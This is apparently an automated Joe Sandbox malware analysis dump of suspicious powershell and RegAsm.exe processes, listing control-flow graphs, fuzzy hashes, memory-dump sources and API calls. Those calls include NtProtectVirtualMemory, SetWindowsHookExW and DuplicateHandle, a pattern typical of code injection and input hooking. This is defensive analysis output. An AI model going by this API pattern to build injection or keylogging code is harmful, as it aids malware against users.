                                                                      • Instruction Fuzzy Hash: 5D41E362B2FE8F1BF7A9A6A8087137467C2DF91254B4A01BED45DC72E3ED2CB9054211

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1052 7ffd9b981e48 1053 7ffd9b981e51-7ffd9b981e5a 1052->1053 1054 7ffd9b981e73-7ffd9b981e80 1053->1054 1055 7ffd9b981e5c-7ffd9b981e69 1053->1055 1055->1054 1057 7ffd9b981e6b-7ffd9b981e71 1055->1057 1057->1054
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1887487025.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 13d41ba8636f307a9d8dd145ee2c3894fed083ccc8c209551d08b3c947b13f4c
                                                                      • Instruction ID: 35d648be118c7a78aafeae7013fe6c0393fd5b8fd381297b08508461ce3d53c4
                                                                      • Opcode Fuzzy Hash: 13d41ba8636f307a9d8dd145ee2c3894fed083ccc8c209551d08b3c947b13f4c
                                                                      • Instruction Fuzzy Hash: 06E09A23F1ED2E1FEBA1A69828681A46B80DF58625B5901B7E81EC31A2EE1098114386
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1886251879.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \K_^
                                                                      • API String ID: 0-1839214671
                                                                      • Opcode ID: 22f881efca8db22ec020776f808aca5fbf3ee0c80afb4ca926549d1144b3acdb
                                                                      • Instruction ID: 13bdb9fd061b1f769ac62287737573ddee7e7f18d7d48d89d94c20969f9efa05
                                                                      • Opcode Fuzzy Hash: 22f881efca8db22ec020776f808aca5fbf3ee0c80afb4ca926549d1144b3acdb
                                                                      • Instruction Fuzzy Hash: 06811B12B0D57A4AE76A77FC78A55F86790DF49328B0942F7C04D8B0E7ED08698792C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1886251879.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f5172412ade51a7d9e1ff91cede236facfcb5c6d1b6e00b790bfa9c398f61f29
                                                                      • Instruction ID: d7a64d96a273911a1689f6b8904488124e8c1711f7d136fe9c531aa1db6b0c0d
                                                                      • Opcode Fuzzy Hash: f5172412ade51a7d9e1ff91cede236facfcb5c6d1b6e00b790bfa9c398f61f29
                                                                      • Instruction Fuzzy Hash: E3322A31B1DA494BE76CA76CA4626B973C2FF9C714F04467EE04EC71D3DE28B9028681
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1887487025.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e8a95f5d3861eabe6107dd78c89bb36eaa286d4ba9aeceeefc9e9b27d36c5b5b
                                                                      • Instruction ID: 17bebcd8127c5981385baa5ec262d57e04dc70ff727a7c4366a4f6470271ba02
                                                                      • Opcode Fuzzy Hash: e8a95f5d3861eabe6107dd78c89bb36eaa286d4ba9aeceeefc9e9b27d36c5b5b
                                                                      • Instruction Fuzzy Hash: 5B41D352A1FFDA2FE3A68B7808765A07F90AF57654B1E40FAD098CB0F3DD2869058351

                                                                      Execution Graph

                                                                      Execution Coverage:10.6%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:7.3%
                                                                      Total number of Nodes:41
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 19240 1550ef5 19246 1550efa 19240->19246 19241 1550f82 19253 1553a70 19241->19253 19257 1553a80 19241->19257 19242 1550ffa 19246->19241 19247 1551008 19246->19247 19248 1550fd9 19247->19248 19249 155100d 19247->19249 19251 1553a70 SetWindowsHookExW 19248->19251 19252 1553a80 SetWindowsHookExW 19248->19252 19249->19241 19250 1550ffa 19250->19241 19251->19250 19252->19250 19254 1553a80 19253->19254 19261 155248c 19254->19261 19256 1553ac5 19256->19256 19258 1553a81 19257->19258 19259 155248c SetWindowsHookExW 19258->19259 19260 1553ac5 19259->19260 19263 1553cf8 SetWindowsHookExW 19261->19263 19264 1553d82 19263->19264 19264->19256 19272 1553370 19273 15533be NtProtectVirtualMemory 19272->19273 19275 1553408 19273->19275 19283 15590e0 DuplicateHandle 19284 1559176 19283->19284 19276 1550e19 19277 1550e38 19276->19277 19278 1550f82 19277->19278 19282 1551008 SetWindowsHookExW 19277->19282 19280 1553a70 SetWindowsHookExW 19278->19280 19281 1553a80 SetWindowsHookExW 19278->19281 19279 1550ffa 19280->19279 19281->19279 19282->19278 19285 1550e09 19286 1550e21 19285->19286 19287 1550e27 19286->19287 19290 1551008 SetWindowsHookExW 19286->19290 19288 1550f82 19287->19288 19293 1551008 SetWindowsHookExW 19287->19293 19291 1553a70 SetWindowsHookExW 19288->19291 19292 1553a80 SetWindowsHookExW 19288->19292 19289 1550ffa 19290->19287 19291->19289 19292->19289 19293->19288

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 513 1552f19-1552f5c 514 1552f5e-1552f60 513->514 515 1552f68-1552f6b 513->515 516 15532d6-1553305 514->516 517 1552f66 514->517 515->516 518 1552f71-1552f94 515->518 534 155330c-1553310 516->534 517->518 521 1552f96-1552f98 518->521 522 1552fa0-1552fa3 518->522 521->516 524 1552f9e 521->524 522->516 525 1552fa9-1552fcf 522->525 524->525 528 1552fd1-1552fd5 525->528 529 1552fdd-1552fe1 525->529 528->516 531 1552fdb 528->531 529->516 532 1552fe7-1552ff5 529->532 531->532 535 1553004-155300c 532->535 536 1552ff7-1553002 532->536 537 1553312-155331c 534->537 538 155331d-1553406 NtProtectVirtualMemory 534->538 539 155300f-1553011 535->539 536->539 566 155340f-1553434 538->566 567 1553408-155340e 538->567 540 1553013-1553015 539->540 541 155301d-1553020 539->541 540->516 543 155301b 540->543 541->516 544 1553026-1553049 541->544 543->544 548 1553055-1553058 544->548 549 155304b-155304d 544->549 548->516 551 155305e-1553082 548->551 549->516 550 1553053 549->550 550->551 554 1553084-1553086 551->554 555 155308e-1553091 551->555 554->516 557 155308c 554->557 555->516 558 1553097-15530b8 555->558 557->558 561 15530c4-15530c7 558->561 562 15530ba-15530bc 558->562 561->516 565 15530cd-15530f1 561->565 562->516 564 15530c2 562->564 564->565 571 15530f3-15530f5 565->571 572 15530fd-1553100 565->572 567->566 571->516 575 15530fb 571->575 572->516 573 1553106-155312a 572->573 577 1553136-1553139 573->577 578 155312c-155312e 573->578 575->573 577->516 580 155313f-1553163 577->580 578->516 579 1553134 578->579 579->580 582 1553165-1553167 580->582 583 155316f-1553172 580->583 582->516 584 155316d 582->584 583->516 585 1553178-155318b 583->585 584->585 585->534 587 1553191-15531c0 585->587 588 15531c2-15531c4 587->588 589 15531cc-15531cf 587->589 588->516 590 15531ca 588->590 589->516 591 15531d5-15531ed 589->591 590->591 593 15531ef-15531f1 591->593 594 15531f9-15531fc 591->594 593->516 595 15531f7 593->595 594->516 596 1553202-1553219 594->596 595->596 599 15532c5-15532ce 596->599 600 155321f-1553242 596->600 599->587 601 15532d4 599->601 602 1553244-1553246 600->602 603 155324e-1553251 600->603 601->534 602->516 604 155324c 602->604 603->516 605 1553257-1553287 603->605 604->605 607 155328f-1553292 605->607 608 1553289-155328b 605->608 607->516 610 1553294-15532b1 607->610 608->516 609 155328d 608->609 609->610 612 15532b3-15532b5 610->612 613 15532b9-15532bc 610->613 612->516 614 15532b7 612->614 613->516 615 15532be-15532c3 613->615 614->615 615->534
                                                                      APIs
                                                                      • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 015533F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4130382428.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1550000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProtectVirtual
                                                                      • String ID: 4|cq
                                                                      • API String ID: 2706961497-1781815312
                                                                      • Opcode ID: 5e2c9a6fd585ff5811ee054637c8959ea0e151fedce18aa654bbe4a5ea6da4fb
                                                                      • Instruction ID: fad941a633c7fd8ec218f0ff9f5c3dbba331837bdc0e43688a420cbe682c9e41
                                                                      • Opcode Fuzzy Hash: 5e2c9a6fd585ff5811ee054637c8959ea0e151fedce18aa654bbe4a5ea6da4fb
                                                                      • Instruction Fuzzy Hash: CCE19331F0460547DB94CABD8CA02AE76E37FC83A4F58862ADD5ADF385EA74D9028741

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1134 1553370-1553406 NtProtectVirtualMemory 1137 155340f-1553434 1134->1137 1138 1553408-155340e 1134->1138 1138->1137
                                                                      APIs
                                                                      • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 015533F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4130382428.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1550000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 2706961497-0
                                                                      • Opcode ID: 2841fecf8b8939eae8d791c56989aa4534d8c80ab35d4c0e621dcf6cd13350de
                                                                      • Instruction ID: 53677210e9c460eb3ca4b0297bf86a4f565254a6076fd7f14a3f8c8c6b2fe6ec
                                                                      • Opcode Fuzzy Hash: 2841fecf8b8939eae8d791c56989aa4534d8c80ab35d4c0e621dcf6cd13350de
                                                                      • Instruction Fuzzy Hash: 262103B1D003499FCB10DFAAD984ADEFBF5FF48310F20842AE919A7240C775A955CBA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 616 6ae48c8-6ae48e5 618 6ae48eb-6ae48ed 616->618 619 6ae4c18-6ae4c76 call 6ae1f30 call 6ae1f50 616->619 620 6ae48ff 618->620 621 6ae48ef-6ae48fd 618->621 650 6ae4c8d-6ae4c93 call 6ae4ca0 619->650 651 6ae4c78-6ae4c8c 619->651 623 6ae4901-6ae4903 620->623 621->623 624 6ae4bfd-6ae4c15 623->624 625 6ae4909-6ae4916 623->625 629 6ae4a6f-6ae4a7c 625->629 630 6ae491c-6ae4922 625->630 629->624 639 6ae4a82-6ae4a88 629->639 632 6ae4924-6ae4926 630->632 633 6ae4930-6ae4950 630->633 632->633 635 6ae4952-6ae4960 633->635 636 6ae4963-6ae4a6c 633->636 635->636 641 6ae4a8a-6ae4a8c 639->641 642 6ae4a96-6ae4b47 639->642 641->642 642->624 676 6ae4b4d-6ae4bfa 642->676 655 6ae4c99-6ae4c9c 650->655
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (bq$$^q
                                                                      • API String ID: 0-3826094709
                                                                      • Opcode ID: af482c469fd50cad53ac24dabcd8503c0a382ec5002dbf4cbd9f9db2b17f2edb
                                                                      • Instruction ID: 6e76657ba1d7e5a3251b0bf7000fed053420f820b2b97579ac2b34e0a41efcfc
                                                                      • Opcode Fuzzy Hash: af482c469fd50cad53ac24dabcd8503c0a382ec5002dbf4cbd9f9db2b17f2edb
                                                                      • Instruction Fuzzy Hash: 76B17DB4F002199FCB48EB7DC85066EBBEAFFC8211F218529E909DB351DE349C4587A1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 695 6ae2178-6ae2190 696 6ae21a2-6ae21ae 695->696 697 6ae2192-6ae219b 695->697 697->696 698 6ae219d-6ae21a0 697->698 698->696 699 6ae21b1-6ae21ba 698->699 700 6ae21bc-6ae21c8 699->700 701 6ae21cb-6ae21d2 699->701 700->701 702 6ae21e7-6ae21ee 701->702 703 6ae21d4-6ae21d6 701->703 705 6ae2200-6ae2208 702->705 706 6ae21f0-6ae21f2 702->706 703->702 704 6ae21d8-6ae21e4 703->704 704->702 708 6ae220a-6ae2217 705->708 709 6ae2219-6ae221d 705->709 706->705 707 6ae21f4-6ae21fd 706->707 707->705 711 6ae2226-6ae222b 708->711 709->711 712 6ae230e-6ae231a 711->712 713 6ae2231-6ae223b 711->713 714 6ae223d-6ae2273 713->714 715 6ae2295-6ae22cd 713->715 720 6ae2279-6ae2293 714->720 721 6ae23d0-6ae23f5 714->721 723 6ae23fc-6ae2421 715->723 724 6ae22d3-6ae22fb 715->724 720->715 721->723 740 6ae2428-6ae2447 723->740 734 6ae22ff 724->734 735 6ae22fd 724->735 737 6ae2302-6ae2305 734->737 735->737 737->712 738 6ae2307 737->738 738->712 739 6ae231d-6ae2322 738->739 738->740 741 6ae2375-6ae237a 738->741 742 6ae2369-6ae2372 739->742 743 6ae2324-6ae232f 739->743 744 6ae237c-6ae2387 741->744 745 6ae23c1-6ae23cd 741->745 743->742 750 6ae2331-6ae235e 743->750 744->745 749 6ae2389-6ae23b6 744->749 749->745 750->742
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (bq$(bq
                                                                      • API String ID: 0-4224401849
                                                                      • Opcode ID: f561559a236908f052acaa80d74152cc59dbb09a39d711ac71fbaaa19cec82b4
                                                                      • Instruction ID: a25f5beb4e151a011a2c08e609d7538640042d2def04bf8ec937341f7d12db55
                                                                      • Opcode Fuzzy Hash: f561559a236908f052acaa80d74152cc59dbb09a39d711ac71fbaaa19cec82b4
                                                                      • Instruction Fuzzy Hash: BF81A135B0021A8FDB54EF68D4547AEB7B6FB88310F14852AEA05EB391CB35DD51CBA0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 759 6ae2ed8-6ae2f08 762 6ae2f3e-6ae2f58 759->762 763 6ae2f0a-6ae2f12 759->763 769 6ae2f8e-6ae2fd8 762->769 770 6ae2f5a-6ae2f62 762->770 764 6ae2f14-6ae2f16 763->764 765 6ae2f20-6ae2f2f 763->765 764->765 771 6ae2f34-6ae2f3b 765->771 772 6ae2f64-6ae2f66 769->772 781 6ae2fda-6ae3022 769->781 770->772 773 6ae2f70-6ae2f8b 770->773 772->773 784 6ae3029 781->784 785 6ae3024-6ae3027 781->785 786 6ae302b-6ae3096 784->786 785->786 795 6ae3098-6ae30a4 786->795 796 6ae30a6 786->796 797 6ae30a8-6ae30ac 795->797 796->797 799 6ae30ae-6ae30ba 797->799 800 6ae30bc 797->800 801 6ae30be-6ae30df 799->801 800->801
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,bq$4'^q
                                                                      • API String ID: 0-1386295989
                                                                      • Opcode ID: 2e4608e747df665d9a19e28e964dd0ab48c04aa0531dcd3d7abf1b9f66d7e54c
                                                                      • Instruction ID: 08d3ee445dcb15cda3db1f342fcb6c039231a7525a50152999a660562ad56bd5
                                                                      • Opcode Fuzzy Hash: 2e4608e747df665d9a19e28e964dd0ab48c04aa0531dcd3d7abf1b9f66d7e54c
                                                                      • Instruction Fuzzy Hash: B5519E71B002158FCB58EB6DC85066FBBFAAFC9310B15806AD509EB355DE34DD0587E1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 894 6ae5ff0-6ae5ffd 895 6ae6157-6ae6160 894->895 896 6ae6003 894->896 908 6ae6166-6ae6169 895->908 897 6ae601e-6ae6023 896->897 898 6ae60ee-6ae60f7 896->898 899 6ae609c-6ae60a5 896->899 900 6ae614d-6ae6155 896->900 901 6ae600a-6ae6019 896->901 902 6ae612a-6ae6141 896->902 903 6ae6048-6ae6051 896->903 904 6ae6118-6ae6128 896->904 905 6ae60c4-6ae60cd 896->905 906 6ae6072-6ae607b 896->906 907 6ae6143 896->907 911 6ae603b-6ae6043 897->911 912 6ae6025-6ae602b 897->912 913 6ae60f9-6ae60fb 898->913 914 6ae6105-6ae6116 898->914 919 6ae60a7-6ae60a9 899->919 920 6ae60b3-6ae60bf 899->920 900->908 901->908 902->908 915 6ae605f-6ae606d 903->915 916 6ae6053-6ae6055 903->916 904->908 909 6ae60cf-6ae60d1 905->909 910 6ae60db-6ae60ec 905->910 917 6ae607d-6ae607f 906->917 918 6ae6089-6ae6097 906->918 937 6ae6145 call 6ae61a0 907->937 938 6ae6145 call 6ae61b0 907->938 909->910 910->908 911->908 922 6ae602f-6ae6039 912->922 923 6ae602d 912->923 913->914 914->908 915->908 916->915 917->918 918->908 919->920 920->908 922->911 923->911 926 6ae614b 926->908 937->926 938->926
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $^q$$^q
                                                                      • API String ID: 0-355816377
                                                                      • Opcode ID: 63f12b16da07c1021ed9ab8eb4c46fd25bc40bc32f2281d58a5c439c75696543
                                                                      • Instruction ID: 48bec1d6b7747b60ae40d15e3000f2c7dd9815b9c37763d9f88216178d50c2d9
                                                                      • Opcode Fuzzy Hash: 63f12b16da07c1021ed9ab8eb4c46fd25bc40bc32f2281d58a5c439c75696543
                                                                      • Instruction Fuzzy Hash: 76415974A04414CFC7897F99C61852ABBB3FF94B05B689C48D1068B296CB329D13CBD2
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01559167
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4130382428.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1550000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 7a59f6bbb2a4c1d92c11fa71a458a7620e8fdae7eebf8e207867be4e3dc9799b
                                                                      • Instruction ID: c685576b509c19e2ea7ad1d5352c20c0b751e1e95cd845ea145d856d4688446e
                                                                      • Opcode Fuzzy Hash: 7a59f6bbb2a4c1d92c11fa71a458a7620e8fdae7eebf8e207867be4e3dc9799b
                                                                      • Instruction Fuzzy Hash: AF2103B5D10208EFDB00CFA9D984ADEBBF8EB48314F14841AE919A7310D338A954CF61
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01559167
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4130382428.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1550000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: c0ab03713c2296f3ee8c1e9daf2c2710480f8b251d01ee5f85c186a2c4b7a9c2
                                                                      • Instruction ID: bd09957f11572223a1b960977642abf0c9cd9b62a24514cfccb4c9116145c9a6
                                                                      • Opcode Fuzzy Hash: c0ab03713c2296f3ee8c1e9daf2c2710480f8b251d01ee5f85c186a2c4b7a9c2
                                                                      • Instruction Fuzzy Hash: 9A21E6B5900258DFDB10CFAAD984ADEBFF4FB48310F14841AE915A7310D374A954CF61
                                                                      APIs
                                                                      • SetWindowsHookExW.USER32(01725DA8,00000000,?,?), ref: 01553D73
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4130382428.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1550000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: HookWindows
                                                                      • String ID:
                                                                      • API String ID: 2559412058-0
                                                                      • Opcode ID: 83caab301a264a2cba0aa2da4f5befc0e6171eef48efca8f7668bc224d90e31e
                                                                      • Instruction ID: c1641b2b62ae4b04ac3c1c1e77d92a6f86b0f279a8a30962b2e8b1751d8c929f
                                                                      • Opcode Fuzzy Hash: 83caab301a264a2cba0aa2da4f5befc0e6171eef48efca8f7668bc224d90e31e
                                                                      • Instruction Fuzzy Hash: C92138B19042099FDB54DF9AC848BEEFBF5FB88350F14842AD519AB250CB74A944CFA1
                                                                      APIs
                                                                      • SetWindowsHookExW.USER32(01725DA8,00000000,?,?), ref: 01553D73
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4130382428.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1550000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: HookWindows
                                                                      • String ID:
                                                                      • API String ID: 2559412058-0
                                                                      • Opcode ID: acaa8ce2bff6aa050d108a98a51b74d1a6e3c4bb2040705fbfa851c40218e18d
                                                                      • Instruction ID: cec931179f044386dcb202d27e233abcc868b9b5e4ad92da6f56da2ccb6599f0
                                                                      • Opcode Fuzzy Hash: acaa8ce2bff6aa050d108a98a51b74d1a6e3c4bb2040705fbfa851c40218e18d
                                                                      • Instruction Fuzzy Hash: A62138B5D002099FDB54DFAAC844BDEFBF5FB88350F14842AD519A7250CB74A944CFA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: xbq
                                                                      • API String ID: 0-73991425
                                                                      • Opcode ID: 644405e08eed801d9639160a17378e728247e12809f2d526d3d79d82feadeaa8
                                                                      • Instruction ID: d00ed3cb73ad60fca1a496d38653675106c00fd6b628b43536dec6f0784ec22d
                                                                      • Opcode Fuzzy Hash: 644405e08eed801d9639160a17378e728247e12809f2d526d3d79d82feadeaa8
                                                                      • Instruction Fuzzy Hash: C6915B74A056019FDBB8EF29E89879977F2BB94335F54D91AC5008B298C770A887CF81
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: b3530ac409e604fc8feceeb0e35e3762ec27873ceaf3c3e9dc94d030ce177b23
                                                                      • Instruction ID: 3fe0fa2d02dbab33e7502431fe7518f0d73e1534dd88162248ff583f607363c5
                                                                      • Opcode Fuzzy Hash: b3530ac409e604fc8feceeb0e35e3762ec27873ceaf3c3e9dc94d030ce177b23
                                                                      • Instruction Fuzzy Hash: C3519E74A00205DFE764EF69D858B69BBF2FF88710F20455AE511AB3E5CB71AC41CB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $^q
                                                                      • API String ID: 0-388095546
                                                                      • Opcode ID: 17bee80756fd38ce6338b68c7a1bd5b6f09140bc32c790c20d90f8a14af36f9b
                                                                      • Instruction ID: 43b8ea47d8b475f407affd69895c0dd2161e32ff7b7ae1237c2d2271b1afbb51
                                                                      • Opcode Fuzzy Hash: 17bee80756fd38ce6338b68c7a1bd5b6f09140bc32c790c20d90f8a14af36f9b
                                                                      • Instruction Fuzzy Hash: 1F417C74A08550CFC78A7FA9851802DBB73FFA1705B688889D1078F292CB329D17CBD2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: 2f74d88609aa2d0ad1d31ea06f762e7750207acafd50f25678af9b41ac884247
                                                                      • Instruction ID: 446995f58188df4b833f122068509b9267d31a8bdd69d9b08a1e0daa6e428f81
                                                                      • Opcode Fuzzy Hash: 2f74d88609aa2d0ad1d31ea06f762e7750207acafd50f25678af9b41ac884247
                                                                      • Instruction Fuzzy Hash: E2317170F001068FEB59AF69C4547AEBAF6EF88710F25445AE541EB394CEB48C45CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: f9465abba4f39294e06834db8811cb4802e28b5e76af5fe4cd3069316bbb54a2
                                                                      • Instruction ID: 8609d279779fbafcee4652a1bb94a6fc7367639cb1ea3965074cade05c8179be
                                                                      • Opcode Fuzzy Hash: f9465abba4f39294e06834db8811cb4802e28b5e76af5fe4cd3069316bbb54a2
                                                                      • Instruction Fuzzy Hash: 2E218B30B101508FDB94AF38D558BAEBBF6AF88704F2540A9E102DB3A1CBB58C05CB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $^q
                                                                      • API String ID: 0-388095546
                                                                      • Opcode ID: 40c8b0c703796ddada96d8a35d0010afa86d6c949b7a2a899893aba7a5360ee1
                                                                      • Instruction ID: 75be78e38e8dc00cc9a3a89e8db9d178e0e515421afcc720d8eac6a5b001dd9c
                                                                      • Opcode Fuzzy Hash: 40c8b0c703796ddada96d8a35d0010afa86d6c949b7a2a899893aba7a5360ee1
                                                                      • Instruction Fuzzy Hash: 3B11AC71B002454FC728EF6AD814A6A7BDAEFC9751B14806AF604CF264DA64DC42C7E0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: 4f7354378964023793aa13d39de0f202adc1059f0f019ae7aca0b21c15ea51c4
                                                                      • Instruction ID: 2dafac0abff6f5c6dee8931ad6708b9ae2a04a458a8a3d3deb157ae104eb653e
                                                                      • Opcode Fuzzy Hash: 4f7354378964023793aa13d39de0f202adc1059f0f019ae7aca0b21c15ea51c4
                                                                      • Instruction Fuzzy Hash: F821C630B101069FDB559F68C918BAEBBF2EF88310F140659E542EB3E1CB708C05CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
